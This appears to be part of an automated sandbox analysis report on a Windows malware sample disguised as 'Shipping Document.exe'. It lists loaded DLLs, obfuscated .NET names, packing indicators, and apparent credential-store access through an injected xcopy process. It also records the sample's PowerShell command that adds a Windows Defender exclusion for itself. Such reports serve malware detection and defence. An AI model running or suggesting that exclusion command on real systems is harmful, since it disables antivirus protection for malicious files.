                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Shipping Document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Shipping Document.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Shipping Document.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: Shipping Document.exeStatic file information: File size 1199104 > 1048576
                Source: Shipping Document.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x108800
                Source: Shipping Document.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: xcopy.pdbUGP source: Shipping Document.exe, 0000000A.00000002.1436200153.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000003.1506541365.0000000000F85000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Shipping Document.exe, 0000000A.00000002.1436632647.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1437540108.0000000003882000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003BCE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003A30000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1435763271.00000000036D5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Shipping Document.exe, Shipping Document.exe, 0000000A.00000002.1436632647.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1437540108.0000000003882000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003BCE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003A30000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1435763271.00000000036D5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: xcopy.pdb source: Shipping Document.exe, 0000000A.00000002.1436200153.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000003.1506541365.0000000000F85000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rtO5LARBHjW9nKZi.exe, 00000015.00000000.1358502913.0000000000F0F000.00000002.00000001.01000000.0000000F.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, e6tPm0aIb7UvqPflDt.cs.Net Code: xfnAkrj3i9 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, e6tPm0aIb7UvqPflDt.cs.Net Code: xfnAkrj3i9 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, e6tPm0aIb7UvqPflDt.cs.Net Code: xfnAkrj3i9 System.Reflection.Assembly.Load(byte[])
                Suspicious powershell command line found
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe"
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe"Jump to behavior
                Source: Shipping Document.exeStatic PE information: 0x99B80416 [Fri Sep 22 05:35:18 2051 UTC]
                Source: Shipping Document.exeStatic PE information: section name: taM%C#%u
                Source: Shipping Document.exeStatic PE information: section name:
                Source: KOENBvWt.exe.0.drStatic PE information: section name: taM%C#%u
                Source: KOENBvWt.exe.0.drStatic PE information: section name:
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_07FBDD4A push es; ret 0_2_07FBDD4C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00411946 push ebp; iretd 10_2_00411947
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00405172 push ss; ret 10_2_00405174
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00401900 push ss; ret 10_2_00401902
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_004031D0 push eax; ret 10_2_004031D2
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00408208 push eax; retf 10_2_0040820B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00418238 push ebx; retf 10_2_0041823E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_004143E1 push cs; iretd 10_2_004143EF
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_004173FA push 36BCB849h; ret 10_2_00417406
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00417407 push 36BCB849h; ret 10_2_00417405
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00401D77 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00401DE2 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00401DE4 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00401DF1 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00401DF3 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00401D8F push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00401E00 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00401E02 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00401E14 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00401EDA push ebp; ret 10_2_00401EE8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00413FFA push ebp; ret 10_2_00414005
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010D225F pushad ; ret 10_2_010D27F9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010D27FA pushad ; ret 10_2_010D27F9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011009AD push ecx; mov dword ptr [esp], ecx10_2_011009B6
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010D283D push eax; iretd 10_2_010D2858
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010D1368 push eax; iretd 10_2_010D1369
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_04BBC97C push eax; ret 12_2_04BBC949
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_04BBF258 push eax; ret 12_2_04BBF259
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_084630D1 pushad ; iretd 12_2_084630D3
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_08464243 pushfd ; iretd 12_2_08464245
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 12_2_08463CC6 push ss; iretd 12_2_08463CC7
                Source: Shipping Document.exeStatic PE information: section name: taM%C#%u entropy: 7.998629772185087
                Source: Shipping Document.exeStatic PE information: section name: .text entropy: 7.9337476307846275
                Source: KOENBvWt.exe.0.drStatic PE information: section name: taM%C#%u entropy: 7.998629772185087
                Source: KOENBvWt.exe.0.drStatic PE information: section name: .text entropy: 7.9337476307846275
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, e6tPm0aIb7UvqPflDt.csHigh entropy of concatenated method names: 'ev2TM4VHRD', 'q2ZT85jiWW', 'A30TcAPup7', 'jV3TVKrDDJ', 'HtdTt9eNAt', 'HRaTbgcmAs', 'TdWTY8N9dO', 'FXNTa7k0iD', 'lToTJXdfNM', 'iBHTul0BnY'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, QK1XyLcrf1gUppmsAj.csHigh entropy of concatenated method names: 'Dispose', 'WXi7DyPv2g', 'kNgrOUJlho', 'YeVI5FHF7T', 'bos7qPO42i', 'Jo47zrnMOd', 'ProcessDialogKey', 'vpWr9Vixqd', 'piqr7ODDhE', 'vADrrDkER9'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, pmYHbZ63s7duoTHIGq.csHigh entropy of concatenated method names: 'qoqYF0sMnZ', 'aZjYP2BUwN', 'WUMYkOAgRj', 'NsjYvhe977', 'NWmYNWRiwF', 'r6PYpFhQcO', 'NGdYyOqfym', 'd9jYfDMxNR', 'VaFYLq0eGJ', 'Qb0Yh2VtWT'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, F6CiRLgqx6Lxnpnjqk.csHigh entropy of concatenated method names: 'ykqKmBdFae', 'gWCKqNMIUv', 'DdDG9rtfDY', 'HMEG78seKY', 'HwZKdOfHud', 'S3CK2eOndx', 'CbXK3gy85B', 'ovIKQSRmg5', 'k8FKUQNpuL', 'LuUK5kDi5u'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, m4ifnYVmIeQeNVfHwS.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SHRrDd619V', 'OBsrqBrWZC', 'UVJrzoVLmk', 'UePT9jIAu2', 'O7IT7KD3tM', 'SQCTrio05G', 'uo7TTX5yd3', 'bca6u1q57MH0coUf6BM'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, cZaLqkrPjuZss87qNC.csHigh entropy of concatenated method names: 'Eaakhiyy0', 'KcYvm0Qfs', 'eBhpywZPC', 'Wf1y5OmNE', 'AdrLi1qI5', 'PI0hk5roo', 'K5VkJTS2IR5eA9DumB', 'KKYvIdwjY8PfjrX1OX', 'rgCGfGk73', 'ihFIfcByd'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, w0cHSBC9YZ920FR27s.csHigh entropy of concatenated method names: 'J5QKuhep0v', 'O2XKB7SpDQ', 'ToString', 'xX8K8rh4qg', 'hWRKciy8KI', 'tt8KVRJDUx', 'i9LKtXjdhh', 'feZKbk6XVR', 'fdAKYOchA0', 'YTiKaOQY7U'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, SEHKQw3SBefxUN5Qlk.csHigh entropy of concatenated method names: 'WgTjfyQ87I', 'zx9jL8Unny', 'TTAjRri0U3', 'FnFjOA5Kiy', 'OoKjE0YXyT', 'LeqjonUTJi', 'YsmjWQ35OW', 'm2BjsAQyVk', 'y3hj1EjTah', 'rrqjduIP0O'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, NNA24mLJObF0Y8gmVg.csHigh entropy of concatenated method names: 'rrBVvfXBeF', 'mbeVpyRWM7', 'X9sVf0rbHJ', 'p80VLZAFsN', 'YbyVlE3eY3', 'T2mVw6ec8F', 'UYCVKVl2EM', 'LnvVGY1Qcb', 'sNnVxui14I', 'IM8VID4vyX'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, DI9IOsHnWmXiyPv2gr.csHigh entropy of concatenated method names: 'i6Gxl4RigR', 'tAMxKm3uPq', 'T1SxxoNKmS', 'X18xSYCKvw', 'phsxihAvLM', 'RBsxnDE5vP', 'Dispose', 'jH2G8AEZH5', 'y35Gc0jX8Y', 'NlhGV9fMrT'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, mYuBxX5y3QFtX3Y1Qp.csHigh entropy of concatenated method names: 'ToString', 'YFewdo10hE', 'DYpwOg5MyU', 'YViwZPx0iC', 'eSbwE1uEZT', 'vR2wo3o8mC', 'LKlwX168lE', 'I7rwWvm8Oy', 'mnXwsQp5du', 'EVKw6X23aA'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, F7dFk7fClPC3QVcrtR.csHigh entropy of concatenated method names: 'IQ1cQxEFNB', 'guTcUO11sq', 'efWc5tIXX5', 'jMUcCyGbgU', 'zicc4KAoOK', 'qOCcgpoQn7', 'TpUcH4kNc7', 'dd0cmi9tYU', 'qjYcDUXQqi', 'Q5JcqhXkgO'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, V9a8Lxh7SJDtCArE0g.csHigh entropy of concatenated method names: 'TmMtNm7Ed5', 'HWlty6HC0d', 'eCYVZbaiNf', 'MsVVERNHlK', 'qW9Voq6D8e', 'VcCVX1wdSX', 'iTDVWIHA2t', 'dlDVsXqLlH', 'JFUV6Lbvaj', 'UvHV184huT'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, YkER94q6wgiamQlpyt.csHigh entropy of concatenated method names: 'QvEIVtgamv', 'zA4It8b61W', 'V4yIbhT16P', 'oopIYT0OHU', 'dBsIxVu6aA', 'urhIaO2RQM', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, XxRrBoRYHAhRJ9d1hx.csHigh entropy of concatenated method names: 'KuZbMZJai7', 'BrObcB0U7M', 'YpqbtaoPrW', 'yUobYIBbEb', 'lH1baXwLMR', 'KIjt4ZrLhv', 'PErtgHuGdA', 'kG7tHMuvna', 'FFEtmyk62r', 'KYMtDlMefl'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, K13cVp77eDhDLX23eCa.csHigh entropy of concatenated method names: 'hodIquUZLF', 'iaEIzOVj3G', 'DqtS9FESXL', 'RL9S75d92j', 'TkFSrAhTmh', 'yntSTi2w5p', 'CCaSAnR5Rx', 'vMgSMxlo27', 'MDQS8xlD8n', 'eMHSc5Batb'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, LVixqdDKiqODDhE0AD.csHigh entropy of concatenated method names: 'NpDxRN3tfW', 'IqRxOfcWoP', 'Q65xZJEaTg', 'eewxEEDeAK', 'NUExo8hXPY', 'GRAxXYIEI8', 'B1TxWOPdXA', 'rOBxst3x0Z', 'sSUx67sCDa', 'cNLx1JGFDi'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, EUCmVyzOIn3f4YK45Z.csHigh entropy of concatenated method names: 'bgjIpcWWTY', 'CdRIf8s5VJ', 'J6GILaZ9EQ', 'uAcIREYfBi', 'EU4IOmdekf', 'xH8IE9bkDs', 'nQmIooEQIX', 'Oj5InTbDrW', 'Tc1IFvu0he', 'E72IPVjxSP'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, VtRbyDAZjAG166sI2i.csHigh entropy of concatenated method names: 'm6h7Y7dFk7', 'TlP7aC3QVc', 'XJO7ubF0Y8', 'VmV7BgH9a8', 'erE7l0gmxR', 'cBo7wYHAhR', 'rxvOJxQmHQduEgA5nO', 'LgVHTgFVCk4UD5Llf4', 'K9U77yJOOH', 'v1h7TPUdYv'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, nMxMf67AEbxBe3ZHhK8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KoXexB1i4w', 'LR8eILZos8', 'viPeSfsP4D', 'pFAeeL7pm0', 'T2xei1U3WB', 'EaAe0qORi1', 'VtlenQtIyw'
                Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, vj1yyY7TvHQ5YX1cMa9.csHigh entropy of concatenated method names: 'jgJSqWpLlY', 'Dd4SzBCxD3', 'TPFe9QZWSu', 'bJsTToWqjtMaNhknH5f', 'GuC1hIW5mqBFgdqXYZ5', 'Afbuf0WA41KOKyQaIc2'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, e6tPm0aIb7UvqPflDt.csHigh entropy of concatenated method names: 'ev2TM4VHRD', 'q2ZT85jiWW', 'A30TcAPup7', 'jV3TVKrDDJ', 'HtdTt9eNAt', 'HRaTbgcmAs', 'TdWTY8N9dO', 'FXNTa7k0iD', 'lToTJXdfNM', 'iBHTul0BnY'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, QK1XyLcrf1gUppmsAj.csHigh entropy of concatenated method names: 'Dispose', 'WXi7DyPv2g', 'kNgrOUJlho', 'YeVI5FHF7T', 'bos7qPO42i', 'Jo47zrnMOd', 'ProcessDialogKey', 'vpWr9Vixqd', 'piqr7ODDhE', 'vADrrDkER9'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, pmYHbZ63s7duoTHIGq.csHigh entropy of concatenated method names: 'qoqYF0sMnZ', 'aZjYP2BUwN', 'WUMYkOAgRj', 'NsjYvhe977', 'NWmYNWRiwF', 'r6PYpFhQcO', 'NGdYyOqfym', 'd9jYfDMxNR', 'VaFYLq0eGJ', 'Qb0Yh2VtWT'
                Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, F6CiRLgqx6Lxnpnjqk.csHigh entropy of concatenated method names: 'ykqKmBdFae', 'gWCKqNMIUv', 'DdDG9rtfDY', 'HMEG78seKY', 'HwZKdOfHud', 'S3CK2eOndx', 'CbXK3gy85B', 'ovIKQSRmg5', 'k8FKUQNpuL', 'LuUK5kDi5u'
